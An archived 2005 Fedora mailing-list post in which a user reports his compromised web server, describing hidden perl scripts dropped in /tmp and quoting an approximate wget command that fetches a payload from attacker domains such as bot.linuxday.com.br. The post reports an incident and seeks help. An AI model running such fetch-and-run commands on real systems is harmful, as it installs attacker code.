Server compromissed

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

To: fedora-list@xxxxxxxxxx
Subject: Server compromissed
From: paul@xxxxxxxxxxxxxxxxxxx
Date: Thu, 17 Feb 2005 22:20:02 -0800 (PST)
Importance: Normal
List-archive: <https://www.redhat.com/archives/fedora-list>
List-help: <mailto:[email protected]?subject=help>
List-id: For users of Fedora Core releases <fedora-list.redhat.com>
List-post: <mailto:[email protected]>
List-subscribe: <http://www.redhat.com/mailman/listinfo/fedora-list>, <mailto:[email protected]?subject=subscribe>
List-unsubscribe: <http://www.redhat.com/mailman/listinfo/fedora-list>, <mailto:[email protected]?subject=unsubscribe>
Reply-to: For users of Fedora Core releases <fedora-list@xxxxxxxxxx>
User-agent: SquirrelMail/1.4.3a-0.f1.1

Apparently someone has hacked into my webserver.  And is installing perl
scripts into he /tmp/ directory.  There usually named .linuxday* or
.cinta* and a few other names as well.

>From what I can tell something is causing apache to run a command like "sh
wget  bot.linuxday.com.br -O {the above mentioned files are than listed}"

sometimes the site is worm.linuxday.com.br

I'm curious if anyone has heard about this before.  I'm currently running
Fedora 1  with all the latests security patches.

Follow-Ups:
- Re: Server compromissed
  - From: Leonard Isham
- Re: Server compromissed
  - From: Bernd Radinger
- Re: Server compromissed
  - From: Michael A. Peters

Prev by Date: Font for printing messages in evolution (FC3)
Next by Date: Re: Server compromissed
Previous by thread: Font for printing messages in evolution (FC3)
Next by thread: Re: Server compromissed
Index(es):
- Date
- Thread

[Index of Archives] [Current Fedora Users] [Fedora Desktop] [Fedora SELinux] [Yosemite News] [Yosemite Photos] [KDE Users] [Fedora Tools] [Fedora Docs]